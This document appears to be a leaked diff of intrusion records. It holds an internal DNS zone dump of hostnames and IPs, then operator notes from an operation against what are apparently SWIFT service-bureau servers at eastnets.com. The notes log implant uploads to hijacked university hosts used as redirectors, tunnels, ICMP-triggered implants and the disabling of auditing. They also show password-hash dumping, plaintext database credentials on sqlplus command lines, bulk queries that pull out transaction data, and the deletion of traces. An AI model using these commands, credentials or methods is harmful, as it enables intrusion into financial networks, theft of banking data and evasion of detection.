+ENMORE [Aging:3607688] 1200 A	192.168.100.124
+ENprojects 3600 A	192.168.0.28
+ENPSDEV [Aging:3618443] 900 A	192.168.50.84
+ENPSQA [Aging:3615491] 1200 A	192.168.50.56
+ENPSSUPPORT-DR [Aging:3618447] 900 A	192.168.50.31
+enpublic 3600 A	192.168.0.36
+enreporting3-1 [Aging:3605144] 1200 A	192.168.253.153
+ENSAFEWATCH 3600 A	80.227.254.232
+ENSBDRSA1 3600 A	192.168.0.32
+ENSBSWIFTTEST 3600 A	192.168.100.95
+ensip 3600 A	192.168.0.7
+ENTEST01 [Aging:3612226] 1200 A	192.168.253.112
+entfs [Aging:3618445] 1200 A	192.168.100.133
+ENTFS2012 [Aging:3618454] 900 A	192.168.50.99
+ENTIEVEGI [Aging:3603183] 1200 A	192.168.253.181
+entranet 3600 A	192.168.0.12
+ENUSA001 [Aging:3604160] 1200 A	192.168.253.73
+ENUSDC01 [Aging:3618466] 3600 A	192.168.153.201
+enusdc02 [Aging:3602989] 1200 A	192.168.153.115
+ENUSFS01 3600 A	192.168.153.200
+ENUSSALE01 [Aging:3618445] 1200 A	192.168.153.114
+envincent [Aging:3610383] 1200 A	192.168.253.188
+ERKAY-PC [Aging:3610573] 1200 A	192.168.50.31
+esaadlap [Aging:3601619] 1200 A	10.10.0.173
+ESurvey [Aging:3617196] 1200 A	192.168.100.142
+exnew131 [Aging:3611838] 1200 A	192.168.50.175
+eyasinlap [Aging:3599094] 1200 A	10.10.0.158
+fatma-laptop [Aging:3596460] 1200 A	10.10.0.76
+fidelity 3600 A	192.168.253.206
+Filtering3_2 [Aging:3607473] 1200 A	192.168.100.161
+FilteringDEV [Aging:3618450] 1200 A	192.168.100.201
+FMX [Aging:3618460] 1200 A	192.168.100.111
+Foracle3_2 [Aging:3602169] 1200 A	192.168.100.163
+fraudisraa [Aging:3607640] 1200 A	192.168.0.239
+FRAUDVM [Aging:3612896] 1200 A	192.168.0.247
+fsql2008 [Aging:3599889] 1200 A	192.168.100.103
+ftp 3600 A	10.10.10.250
+ftpbe 3600 A	192.168.253.142
+ftpenss 3600 A	192.168.253.142
+Gemini 3600 A	192.168.253.167
+GP-TEST [Aging:3607320] 1200 A	192.168.0.126
+GreenGiant 3600 A	192.168.253.240
+group-mail 3600 A	192.168.253.111
+GSM [Aging:3617339] 1200 A	192.168.100.138
+GUILLE [Aging:3617967] 1200 A	192.168.153.122
+GUINEAPIG [Aging:3610297] 1200 A	192.168.253.113
+HAMMAD-PC [Aging:3609344] 1200 A	10.10.10.63
+HAPPY1 3600 A	192.168.253.208
+HAPPY2 3600 A	192.168.253.203
+Helios 3600 A	192.168.253.20
+hermes [Aging:3618444] 1200 A	192.168.253.37
+hqbackup [Aging:3596884] 1200 A	10.10.10.198
+hr 3600 A	192.168.0.11
+HRVM [Aging:3608675] 1200 A	192.168.50.33
+HYPER-V-SERVER [Aging:3618465] 1200 A	192.168.100.31
+IBRAHIM-PC [Aging:3613910] 1200 A	10.10.10.56
+INTEGRATION1 [Aging:3618443] 1200 A	192.168.100.180
+Integration2 [Aging:3618443] 1200 A	192.168.100.190
+Intranet 3600 A	192.168.253.87
+INVESTDAR [Aging:3618449] 900 A	192.168.0.210
+ipek-TOSH [Aging:3606438] 900 A	192.168.0.86
+itbx-side 3600 A	192.168.253.35
+JoanM [Aging:3604927] 1200 A	10.10.10.126
+jupiter [Aging:3618457] 1200 A	192.168.240.2
+jupiter2 [Aging:3618460] 1200 A	192.168.253.2
+		 [Aging:3618460] 1200 A	192.168.240.7
+		 [Aging:3618460] 1200 A	192.168.253.180
+		 [Aging:3618460] 1200 A	192.168.253.194
+JUy [Aging:3599958] 1200 A	10.10.10.117
+KAPFVM [Aging:3618446] 1200 A	192.168.50.192
+kbaluyot [Aging:3604347] 1200 A	10.10.10.118
+kfhbk [Aging:3614838] 1200 A	192.168.100.103
+Khalil-VAIO [Aging:3618361] 1200 A	10.10.10.136
+KIOSKDEV [Aging:3604112] 1200 A	192.168.100.186
+KIOSKQA [Aging:3600804] 1200 A	192.168.100.145
+kronos 3600 A	192.168.253.25
+LAPTOP [Aging:3613859] 1200 A	10.10.10.172
+limo 3600 A	192.168.253.234
+LiteVM [Aging:3607358] 1200 A	192.168.100.181
+LLN 3600 A	192.168.253.2
+Lync 3600 A	192.168.0.7
+mabudarw-xwg4zh 3600 A	192.168.100.84
+mahdy [Aging:3602313] 1200 A	10.10.0.116
+		 [Aging:3602313] 1200 A	10.10.0.59
+MAHDY-PC [Aging:3618464] 1200 A	10.20.0.109
+maximus [Aging:3608193] 3600 A	192.168.253.236
+		 [Aging:3608193] 3600 A	10.10.250.2
+maya 3600 A	192.168.253.74
+medusa 3600 A	192.168.253.1
+meet 3600 A	192.168.0.7
+meeting 3600 A	192.168.0.7
+MHMD-LAP [Aging:3607039] 1200 A	10.10.0.86
+MHMD-PC [Aging:3608122] 1200 A	10.10.0.68
+MICHEL-VAIO [Aging:3618466] 1200 A	192.168.253.144
+		 [Aging:3618466] 1200 A	192.168.253.181
+MJAREER-PC [Aging:3604851] 1200 A	10.10.10.89
+MKHAOUAM-PC [Aging:3617629] 1200 A	192.168.153.156
+MNAYFEH-PC [Aging:3601137] 1200 A	10.10.10.173
+MOBILEVM [Aging:3602098] 1200 A	192.168.100.182
+MonSys [Aging:3603751] 1200 A	10.10.0.14
+MORE2_0 [Aging:3602671] 1200 A	192.168.100.192
+MOREDEV [Aging:3618444] 1200 A	192.168.100.193
+MOREVM [Aging:3618443] 1200 A	192.168.100.166
+MOREVS2012 [Aging:3612537] 1200 A	192.168.0.207
+MQasimXP [Aging:3617414] 1200 A	192.168.50.71
+nezar [Aging:3599989] 1200 A	192.168.253.133
+NNASSR-PC [Aging:3618404] 1200 A	192.168.253.84
+nzr-of25arpakm1 [Aging:3603662] 1200 A	192.168.253.164
+Ofiltering32 [Aging:3605864] 1200 A	192.168.100.167
+ORA322 [Aging:3614176] 1200 A	192.168.50.47
+Oracle10 [Aging:3605771] 1200 A	192.168.100.88
+ORASWF64 [Aging:3618445] 1200 A	192.168.0.122
+OSAIED-PC [Aging:3612319] 1200 A	10.10.10.146
+OSAIED2-PC [Aging:3618369] 1200 A	10.10.10.24
+OSSAMA-ZIDE [Aging:3611628] 1200 A	10.20.0.195
+ossamazide [Aging:3609126] 1200 A	10.10.0.100
+OSTICKET01 [Aging:3606967] 1200 A	192.168.0.224
+PAYSAFE [Aging:3601550] 1200 A	192.168.100.148
+PaySafeBank-Test [Aging:3618463] 1200 A	192.168.100.200
+PAYSAFEDEV [Aging:3614363] 1200 A	192.168.100.194
+PBUELENS [Aging:3608174] 1200 A	192.168.253.93
+pbviews [Aging:3618455] 1200 A	192.168.3.13
+PC5 [Aging:3611243] 1200 A	192.168.50.32
+PORACLE131 [Aging:3618463] 1200 A	192.168.100.128
+POracleVM [Aging:3608143] 1200 A	192.168.0.160
+posserver [Aging:3616996] 1200 A	192.168.100.136
+POSVM [Aging:3613233] 1200 A	192.168.100.185
+presalesvm [Aging:3610022] 1200 A	192.168.50.186
+presalesvm2 [Aging:3610139] 1200 A	192.168.50.43
+PROAJMAN [Aging:3618445] 900 A	192.168.50.136
+profilingaib03 [Aging:3603353] 1200 A	192.168.100.246
+PROFILINGBOJ [Aging:3614916] 1200 A	192.168.50.110
+PSQLVM2008 [Aging:3601932] 1200 A	192.168.100.165
+PWC-VAIO [Aging:3606873] 1200 A	192.168.253.236
+QADB2 [Aging:3618443] 1200 A	192.168.100.70
+qahost1 [Aging:3618464] 1200 A	192.168.100.100
+qahost2 [Aging:3618444] 1200 A	192.168.100.120
+QAHOST3 [Aging:3618453] 1200 A	192.168.100.140
+		 [Aging:3618453] 1200 A	192.168.50.236
+QAHOST4 [Aging:3618465] 1200 A	192.168.100.160
+QASAA7 [Aging:3609634] 1200 A	192.168.100.210
+QATESTING1 [Aging:3618464] 900 A	192.168.50.235
+QATESTING2 [Aging:3616914] 1200 A	192.168.50.103
+Qidrisi [Aging:3597586] 1200 A	10.10.10.22
+qiib-cc [Aging:3609535] 1200 A	192.168.100.137
+QNBAPP [Aging:3609331] 1200 A	192.168.50.101
+QNBAPPDR [Aging:3609331] 1200 A	192.168.50.71
+QNBDB [Aging:3610355] 1200 A	192.168.50.195
+QNBDBDR [Aging:3610290] 1200 A	192.168.0.207
+QNBPH1 [Aging:3613596] 1200 A	192.168.100.106
+QNBPH1-DEV [Aging:3607688] 1200 A	192.168.100.107
+QNBPH2 [Aging:3613595] 1200 A	192.168.100.101
+QNBPH3 [Aging:3605174] 1200 A	192.168.100.169
+QNBPH3QA [Aging:3618083] 1200 A	192.168.100.112
+QNBPH3s4 [Aging:3618299] 1200 A	192.168.100.172
+QNBPH3VM [Aging:3602210] 1200 A	192.168.100.168
+QNBVM [Aging:3602600] 1200 A	192.168.100.109
+RashaLaptop [Aging:3616254] 1200 A	10.10.0.93
+rdevilla-PC [Aging:3613211] 1200 A	10.10.10.137
+reem [Aging:3597870] 1200 A	10.10.10.108
+REPORADB [Aging:3616596] 1200 A	192.168.0.205
+REPORTING2-4 [Aging:3607359] 1200 A	192.168.100.183
+REPORTINGORA [Aging:3610832] 1200 A	192.168.100.159
+REPORTINGSQL [Aging:3615493] 1200 A	192.168.100.149
+RepSoge [Aging:3608480] 1200 A	192.168.100.249
+REPTW [Aging:3606131] 1200 A	192.168.100.150
+ROBIN [Aging:3616045] 1200 A	192.168.153.110
+RSATEST01 [Aging:3597034] 1200 A	192.168.0.31
+rx2660 3600 A	192.168.253.203
+SAA7DEV [Aging:3606178] 1200 A	192.168.100.195
+SAA7DEV1 [Aging:3618461] 1200 A	192.168.100.236
+SAAMQ [Aging:3618301] 1200 A	192.168.100.191
+samerm [Aging:3604808] 1200 A	10.10.10.34
+SCSK [Aging:3612896] 1200 A	192.168.100.88
+SEDSWF [Aging:3604454] 1200 A	192.168.100.155
+SEPA [Aging:3618449] 900 A	192.168.50.105
+serenity 3600 A	192.168.253.78
+SGadallah [Aging:3596996] 1200 A	192.168.153.133
+sharepoint 3600 A	192.168.0.39
+sharepointarray 3600 A	192.168.0.39
+SHERIF-PC [Aging:3600824] 1200 A	10.20.0.106
+SIDE0078 [Aging:3599768] 1200 A	192.168.253.157
+SIDELAP05 [Aging:3602459] 1200 A	192.168.253.173
+sinbad 3600 A	192.168.0.29
+Slap [Aging:3618229] 1200 A	10.10.0.150
+SMOWAFY-LAPTOP [Aging:3618304] 1200 A	10.20.0.102
+Solaris 3600 A	192.168.253.22
+SQLSWF321 [Aging:3615505] 1200 A	192.168.0.236
+sthromas [Aging:3603827] 1200 A	192.168.253.242
+store [Aging:3618450] 1200 A	10.10.10.180
+sunserver 3600 A	192.168.100.114
+SWF312 [Aging:3615514] 1200 A	192.168.100.254
+SWF322 [Aging:3608941] 1200 A	192.168.50.65
+SWF34ORA [Aging:3618465] 900 A	192.168.50.91
+SWF3_3 [Aging:3601741] 1200 A	192.168.100.143
+SWFCAT [Aging:3616526] 1200 A	192.168.100.121
+SWFSQL [Aging:3605984] 1200 A	192.168.100.174
+SWFWAS [Aging:3607689] 1200 A	192.168.100.123
+SWFWL [Aging:3608099] 1200 A	192.168.100.122
+SWIFT2008VM [Aging:3612204] 1200 A	192.168.10.132
+TASWEEQQA [Aging:3608857] 1200 A	192.168.100.237
+Telemak 3600 A	192.168.253.28
+Telemak-LOM 3600 A	192.168.253.247
+TEST1-PC [Aging:3617936] 1200 A	10.10.0.160
+Testbox 3600 A	192.168.253.26
+testing [Aging:3617605] 1200 A	192.168.100.135
+testvista-pc [Aging:3599960] 1200 A	192.168.253.127
+tfs2008mig [Aging:3612513] 1200 A	192.168.50.96
+tfs2008new [Aging:3612229] 1200 A	192.168.50.131
+TFS2010 [Aging:3607112] 1200 A	192.168.100.196
+tfsamman1 [Aging:3618448] 1200 A	192.168.100.245
+tfsammanTest [Aging:3613163] 1200 A	192.168.50.109
+TFSEPM [Aging:3616272] 1200 A	192.168.0.28
+TFSEPM1 [Aging:3610812] 1200 A	192.168.50.93
+TFSHOST [Aging:3618464] 1200 A	192.168.100.250
+TFSTEST2012 [Aging:3613255] 1200 A	192.168.0.184
+theobaxter [Aging:3613037] 1200 A	10.10.10.26
+THEOBAXTER-PC [Aging:3610491] 1200 A	10.10.10.42
+THINKPAD [Aging:3617972] 1200 A	192.168.153.192
+titeuf 3600 A	192.168.253.249
+TKeyrouz [Aging:3609321] 1200 A	10.10.10.66
+TOSHIBA-PC [Aging:3617937] 1200 A	10.10.200.64
+UAEFTSLIVE [Aging:3618464] 900 A	192.168.50.115
+UAEFTSVM [Aging:3618447] 1200 A	192.168.100.158
+ubi [Aging:3618466] 1200 A	192.168.100.130
+user-7uzetgz0uz [Aging:3611672] 1200 A	192.168.50.151
+user-db1aeca1b9 [Aging:3607690] 1200 A	192.168.50.160
+user-pc [Aging:3610811] 1200 A	192.168.50.87
+USER-PC025 [Aging:3608723] 1200 A	192.168.50.150
+vDCBackup [Aging:3618460] 1200 A	192.168.3.16
+vDXBBackup [Aging:3613510] 1200 A	10.10.10.150
+VERICENTRE [Aging:3612537] 1200 A	192.168.100.179
+Viking [Aging:3610578] 1200 A	192.168.253.104
+vMailJournal [Aging:3614975] 1200 A	10.10.10.105
+VMBEXEC01 [Aging:3617292] 1200 A	192.168.50.39
+VMENBARASKIN [Aging:3618457] 1200 A	192.168.253.157
+vNEWPBViews [Aging:3618466] 1200 A	192.168.3.14
+vpn 3600 A	192.168.3.20
+VS2012 [Aging:3610961] 1200 A	192.168.50.146
+w2k3 [Aging:3613617] 1200 A	192.168.253.129
+WAS8 [Aging:3618447] 900 A	192.168.50.36
+wasdev 3600 A	192.168.100.239
+wbukhari [Aging:3596933] 1200 A	10.10.10.113
+webmail 3600 A	192.168.0.50
+WIN-MTO1SG4UMI2 [Aging:3618132] 1200 A	192.168.253.104
+WIN-TGT5TAOB2FM [Aging:3611697] 1200 A	192.168.100.80
+win2003vmtest4 [Aging:3598361] 1200 A	192.168.253.155
+WIN2008VM2 [Aging:3603578] 1200 A	192.168.253.56
+Windows2003test [Aging:3603584] 1200 A	192.168.253.55
+WMQVM [Aging:3616857] 1200 A	192.168.50.192
+wpad 3600 A	10.10.0.10
+WSS2008 [Aging:3613236] 1200 A	192.168.50.161
+WSS_2008 [Aging:3612318] 1200 A	192.168.50.33
+www 3600 A	207.56.175.157
+
+Command completed successfully.
+
+Process terminated with status 0
+
+
+    Command completed successfully

swift/DSL1opnotes.txt

@@ -0,0 +1,347 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	69.42.98.86
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	INCISION
+Redirect Host 1:	163.22.20.4
+Redirect Target 1:	192.168.208.11
+Redirecting Method 2:	INCISION
+Redirect Host 2:	192.168.208.11
+Redirect Target 2:	192.168.200.51
+Redirecting Method 3:	INCISION
+Redirect Host 3:	192.168.208.11
+Redirect Target 3:	192.168.200.87
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+--> 163.22.20.4            euclid.csie.cnu.edu.tw         pitchimpair          unix      successful    
+---> 192.168.208.11        ensbdmgmt2.eastnets.com        jeepflea_market      windows   successful    
+----> 192.168.200.51       ensbdsl1.eastnets.com          jeepflea_market      windows   successful    
+----> 192.168.200.87       ensbdnisl2.eastnets.com        jeepflea_market      windows   successful    
+Ops Machine: WO
+Results:
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=90069
+OPSCHEDULE=13053013155600
+SCRUBVER=6.007000002
+
+======================= P0
+--- 163.22.20.4 ---
+=======================
+ourtn -Y5eU /current/up/noserver-x86sol2.8 -wBIN 163.22.20.4
+2013-06-05 17:55:19 UTC on target.
+
+-w
+Uptime:  16 day(s), 17:07:14
+
+USER      TTY       LOGIN@             IDLE       PID
+
+-logs -x
+-gs pscolor -tp
+-lss . /tmp / /root
+-tail /etc/rc.local
+-tail /etc/ld.so.preload
+
+2013-06-05 17:58:13 UTC clear; moving.
+
+-tunnel
+r 50986 192.168.254.72
+r 41027 192.168.254.72
+
+-logs -x
+-gs pscolor -tp
+-lss . /tmp / /root
+-tail /etc/rc.local
+-tail /etc/ld.so.preload
+2013-06-05 20:26:36 UTC -bB
+
+
+
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000002 20130605-1729
+###################
+SCRUBHANDS v6.007000002 (suite v6.7.0.02 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 13053013155600 -P JEEPFLEA_MARKET -I 90069 -T 11-5 -n 8.8.8.8,4.2.2.2 69.42.98.86/240/94
+###################
+Final lines of bwmonitor.txt:
+Wed Jun 05 20:47:11 UTC 2013
+eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
+  TX     10785343    (10.3)      50975      0.0     (0.0)       0.0       0.1       4.4
+  RX     52281957    (49.9)      58906      0.0     (0.0)       0.0       0.5      55.9
+
+###################################################
+PROJECT: jeepflea_market
+DATE: 05:39 PM 06/05/2013
+OPUSER: 90069
+OPSCHEDULE: 13053013155600
+#Op Status: Unsuccessful
+#Non-Standard: True
+###################################################
+Targets:
+
+
+
+Results:
+======================= T1
+--- 192.168.208.11  --- ensbdmgmt2
+=======================
+UR:JEEPFLEA_MARKET59
+egg prep:
+PITCHIP:50986
+PITCHIP:41027
+PSP: N/A
+   <CallbackAddress>163.22.20.4</CallbackAddress>
+-   <CallbackPorts>
+-     <CallbackPair>
+-       <SrcPort>0</SrcPort>
+-       <DstPort>50986</DstPort>
+-     </CallbackPair>
+-     <CallbackPair>
+-       <SrcPort>0</SrcPort>
+-       <DstPort>41027</DstPort>
+-     </CallbackPair>
+-   </CallbackPorts>
+6:07 PM 6/5/2013 on target.
+
+6:11 PM 6/5/2013 simple barfed on me. Here's the output I got:
+Below match threshold or multiple matches. You must choose. Choose wisely.
+
+  0) None of these - create a new target db
+
+  1) (Confidence: 0.166666666667) JEEPFLEA_MARKET / ENSBDFIIV1 / PC ID 0x000000010001266d / eb62f5d8-4365-41bc-a38b-559bf60ee72d / MACS: ['00-22-64-9d-4d-fc', '00-22-64-9d-4d-fe', '00-24-81-a7-4b-06']
+
+Enter selection:
+0
+* <type 'exceptions.Exception'> : Have a target ID, but data not in database, something is wrong
+--Traceback (most recent call last):
+  File "D:\DSZOpsDisk\Resources\Ops\PyScripts\Connected.py", line 24, in <module>
+    targ = ops.project.getTarget()
+  File "D:\DSZOpsDisk\Resources\Ops\PyScripts\Lib\ops\project\__init__.py", line 125, in getTarget
+    raise Exception('Have a target ID, but data not in database, something is wrong')
+--
+TL;DR: couldn't find the targetdb for the target. Then simple bailed entirely... ran "survey -run" to force simple to run.
+Uptime: 110 days, 19:58:38
+audit dorked; pwdump grabbed.
+
+
+monitor packetredirect -listenport 2160 -raw
+redirect -tcp -lplisten 1922 -target 192.168.200.51 1922
+redirect -tcp -lplisten 9002 -target 192.168.200.87 9002
+
+diffhour -age 3h -sysdrive -recursive
+channels stomped..
+8:25 PM 6/5/2013 QND
+
+======================= T2
+--- 192.168.200.51  --- ensbdsl1
+=======================
+PSP: Symantec Endpoint 11
+Trigger: 0x1000125aa ICMP 8,0 Listen RHP (1922)
+
+           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
+		Target Address    : 192.168.200.51
+		Source Address    : 192.168.200.11
+		Target Protocol   : ICMP
+		ICMP type,code    : 8,0
+		Keyfile           : D:\DSZOpsDisk\Resources\Pc\Keys\JEEPFLEA_MARKET\private_key.bin
+		Listen Address    : 0.0.0.0
+		Listen Port       : 1922
+		Redirect through  : 127.0.0.1:2160
+		Final Destination : 192.168.200.51
+		Id                : 0x00000001000125aa
+		Packet Trailer    : 0x2f78
+
+           ----====**** CORDIALFLIMSY TRIGGER END ****====----
+           
+6:24 PM 6/5/2013 on target.
+Uptime: 6 days, 23:51:50
+dorked audit, pwdumped.
+
+SWIFT collect:
+
+put D:\DSZOpsDisk\tmp\MSIef7bc.LOG -name C:\windows\temp\MSIef7bc.LOG
+cd C:\windows\temp
+run -command "cmd.exe /q" -redirect
+
+D:\alliance\access\database\bin\sqlplus.exe saauser/Aetq9f7CQtljCHtAmstCGF64C 
+@MSIef7bc.LOG
+
+Enter Output File Name: MSIef7bd.LOG
+Enter BEGINNING date in the format "yyyymmdd": 20130201
+Enter ENDING date in the format "yyyymmdd": 20130301
+
+ended out ~19m.
+get C:\WINDOWS\temp\MSIef7bd.LOG
+deleted MSIef7bd.LOG
+
+Enter Output File Name: MSIef7be.LOG
+Enter BEGINNING date in the format "yyyymmdd": 20130302
+Enter ENDING date in the format "yyyymmdd": 20130401
+ended out ~20m
+
+get C:\WINDOWS\temp\MSIef7be.LOG
+deleted file.
+
+Enter Output File Name: MSIef7bf
+Enter BEGINNING date in the format "yyyymmdd": 20130402
+Enter ENDING date in the format "yyyymmdd": 20130420
+
+note: the script will automatically assign an LST extension if you fail to supply an extension...
+
+~3m in size.
+get C:\WINDOWS\temp\MSIef7bf.LST
+deleted .LST file
+
+Enter Output File Name: MSIef7b0.LOG
+Enter BEGINNING date in the format "yyyymmdd": 20130421
+Enter ENDING date in the format "yyyymmdd": 20130510
+
+file ended up being 57 bytes.
+deleted.
+
+re-queried:
+Enter Output File Name: MSIef7b0.LOG
+Enter BEGINNING date in the format "yyyymmdd": 20130421
+Enter ENDING date in the format "yyyymmdd": 20130604
+
+file was 57 bytes again.
+grabbed and deleted.
+
+deleting MSIef7bc.LOG
+
+going to do a survey of the database to see what's wrong here...
+put D:\DSZOpsDisk\tmp\MSI6fe11.LOG -name C:\windows\temp\MSI6fe11.LOG
+
+D:\alliance\access\database\bin\sqlplus.exe / as SYSDBA
+@MSI6fe11.LOG
+MSI6ff11.LOG output filename.
+
+file is appox. 5k
+grabbed and deleting
+
+deleted MSI6fe11.LOG
+
+7:35 PM 6/5/2013 all done here; no residue. time to go.
+
+grabbed:
+D:\alliance\access\database\network\admin\
+tnsnames.ora
+sqlnet.ora
+listener.ora
+
+diffhour -age 2h -sysdrive -recursive
+channels
+7:45 PM 6/5/2013 QND
+
+
+
+
+======================= T3
+--- 192.168.200.87  --- ensbdnisl2
+=======================
+PSP: Symantec Endpoint 11
+Trigger: 0x1000125b9 ICMP 8,0 Listen RHP (9002)
+
+           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
+		Target Address    : 192.168.200.87
+		Source Address    : 192.168.200.11
+		Target Protocol   : ICMP
+		ICMP type,code    : 8,0
+		Keyfile           : D:\DSZOpsDisk\Resources\Pc\Keys\JEEPFLEA_MARKET\private_key.bin
+		Listen Address    : 0.0.0.0
+		Listen Port       : 9002
+		Redirect through  : 127.0.0.1:2160
+		Final Destination : 192.168.200.87
+		Id                : 0x00000001000125b9
+		Packet Trailer    : 0x3036
+
+           ----====**** CORDIALFLIMSY TRIGGER END ****====----
+6:25 PM 6/5/2013 on target.
+Below match threshold or multiple matches. You must choose. Choose wisely.
+
+  0) None of these - create a new target db
+
+  1) (Confidence: 0.166666666667) JEEPFLEA_MARKET / ENSBDSL3 / PC ID 0x00000001000125b8 / ee72ac50-2d6f-4198-b196-724303e12f23 / MACS: ['00-23-7d-f2-d6-08']
+
+Enter selection:
+0
+* <type 'exceptions.Exception'> : Have a target ID, but data not in database, something is wrong
+--Traceback (most recent call last):
+  File "D:\DSZOpsDisk\Resources\Ops\PyScripts\Connected.py", line 24, in <module>
+    targ = ops.project.getTarget()
+  File "D:\DSZOpsDisk\Resources\Ops\PyScripts\Lib\ops\project\__init__.py", line 125, in getTarget
+    raise Exception('Have a target ID, but data not in database, something is wrong')
+--
+TL;Dr: simple exploded again. Can't find the targetdb. same issue as T1. going to run "survey -run"
+
+Uptime: 26 days, 22:22:20
+dorked auditing; grabbed pwdump.
+
+put D:\DSZOpsDisk\tmp\MSIef7bc.LOG -name C:\$recycle.bin\S-1-5-21-2744848747-1958344455-2925660524-500\$ITFPV00.txt
+cd C:\$recycle.bin\S-1-5-21-2744848747-1958344455-2925660524-500\
+run -command "cmd.exe /q" -redirect
+
+
+
+
+D:\alliance\access\database\bin\sqlplus.exe saauser/AF1TR6SnML9U1riiGuMxQRQH5 
+@$ITFPV00.txt
+
+Enter Output File Name: $ITFPV01.txt
+Enter BEGINNING date in the format "yyyymmdd": 20120101
+Enter ENDING date in the format "yyyymmdd": 20120201
+~4m in size.
+grabbing...
+deleting.
+
+Enter Output File Name: $ITFPV02.txt
+Enter BEGINNING date in the format "yyyymmdd": 20120202
+Enter ENDING date in the format "yyyymmdd": 20120501
+~11m in size.
+grabbing...
+deleting.
+
+Enter Output File Name: $ITFPV03.txt
+Enter BEGINNING date in the format "yyyymmdd": 20120502
+Enter ENDING date in the format "yyyymmdd": 20120801
+~10m in size
+grabbing...
+deleting.
+
+Enter Output File Name: $ITFPV04.txt
+Enter BEGINNING date in the format "yyyymmdd": 20120802
+Enter ENDING date in the format "yyyymmdd": 20130101
+accidentally deleted our collection. re-querying, same parameters.
+~20m
+grabbing...
+deleting.
+
+Enter Output File Name: $ITFPV05.txt
+Enter BEGINNING date in the format "yyyymmdd": 20130102
+Enter ENDING date in the format "yyyymmdd": 20130401
+~15m
+grabbing...
+deleting.
+
+Enter Output File Name: $ITFPV06.txt
+Enter BEGINNING date in the format "yyyymmdd": 20130402
+Enter ENDING date in the format "yyyymmdd": 20130604
+~12m
+grabbing...
+deleting.
+
+deleted ITFPV00
+8:20 PM 6/5/2013 all done here.
+
+diffhour -age 2h -sysdrive -recursive
+channels
+8:23 PM 6/5/2013 QND

swift/DSL2opnotes.txt

@@ -0,0 +1,210 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	89.185.234.145
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	PITCHIMPAIR
+Redirect Host 1:	133.94.1.3
+Redirect Target 1:	192.168.208.11
+Redirecting Method 2:	INCISION
+Redirect Host 2:	192.168.208.11
+Redirect Target 2:	192.168.200.52
+Redirecting Method 3:	INCISION
+Redirect Host 3:	192.168.208.11
+Redirect Target 3:	192.168.200.86
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+--> 133.94.1.3             cis.cc.kurume-it.ac.jp         pitchimpair          unix      successful    
+---> 192.168.208.11        ensbdmgmt2.eastnets.com        jeepflea_market      windows   successful    
+----> 192.168.200.52       ensbdsl2.eastnets.com          jeepflea_market      windows   successful    
+----> 192.168.200.86       ensbdnisl1.eastnets.com        jeepflea_market      windows   successful    
+Ops Machine: WO
+Results:
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=37322
+OPSCHEDULE=13050914490339
+SCRUBVER=6.006000037
+
+======================= P0
+--- 133.94.1.3   --- cis
+=======================
+ourtn -eY5U /current/up/noserver -wBIN 133.94.1.3
+
+2013-05-14 12:35:13 UTC -- on target
+
+  9:35pm  up 33 day(s), 22:52,  0 users,  load average: 0.00, 0.00, 0.00
+User     tty           login@  idle   JCPU   PCPU  what
+Tue May 14 21:35:30 JST 2013
+Tue May 14 12:35:30 GMT 2013
+
+SunOS cis 5.10 Generic_142900-09 sun4u sparc SUNW,Sun-Fire-V250
+
+
+-tunnel
+r 44378 192.168.254.72 44378
+
+2013-05-14 16:36:01 UTC -- burn
+
+
+
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000037 20130514-1225
+###################
+SCRUBHANDS v6.006000037 (suite v6.6.0.37 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 13050914490339 -I 37322 -P JEEPFLEA_MARKET -n 8.8.8.8 89.185.234.145/240/158
+###################
+Final lines of bwmonitor.txt:
+Tue May 14 16:38:39 UTC 2013
+eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
+  TX     10790208    (10.3)      33780      0.0     (0.0)       0.0       0.1       3.2
+  RX     20340406    (19.4)      35347      0.0     (0.0)       0.1       0.3       4.2
+
+###################################################
+PROJECT: JEEPFLEA_MARKET
+DATE: 12:31 PM 05/14/2013
+OPUSER: 37322
+OPSCHEDULE: 13050914490339
+#Op Status: Unsuccessful
+#Non-Standard: True
+###################################################
+Targets:
+
+
+
+Results:
+
+#z0.0.0.11 = 192.168.208.11 
+#z0.0.0.12,z0.0.0.13 = 192.168.200.52
+#z0.0.0.14,z0.0.0.15,z0.0.0.16 = 192.168.200.86
+
+======================= T1
+---   192.168.208.11    --- ENSBDMGMT2
+=======================
+
+
+Win2k8 64bit R2
+
+UR callback 44378
+	
+1:03 PM 5/14/2013 -- on target
+
+	Uptime:88 days, 14:46:22
+	Auditing:[2013-05-14 13:01:44 z0.0.0.11] Security auditing dorked, do not stop command 275 or you will lose your blessing
+	PSP: 
+	
+    12972 | 11452 | ------C:\Windows\system32\telnet.exe
+    
+    
+	dir -mask * -path c:\ -age 1h -recursive
+	prettych
+	quitanddelete
+	
+    monitor packetredirect -listenport 3333 -raw
+	redirect -tcp -implantlisten 4426 -target 127.0.0.1 4426
+	
+4:26 PM 5/14/2013 -- BURNED
+
+======================= T2
+---   192.168.200.52    --- ENSBDSL2
+=======================
+Win2k8 64 bit R2
+1:25 PM 5/14/2013	 PC2 target : 192.168.200.52
+		              source : 192.168.200.11
+                      final  : 192.168.200.52
+                      cb     : 4378, 192.168.200.11
+                      id     : 0x100011b3c
+					  
+                      key    : jeepflea_market
+                      ICMP   : ICMP 8,0
+		
+	Uptime:4 days, 16:6:5
+	Auditing:2013-05-14 13:30:17 z0.0.0.12] Security auditing dorked, do not stop command 798 or you will lose your blessing
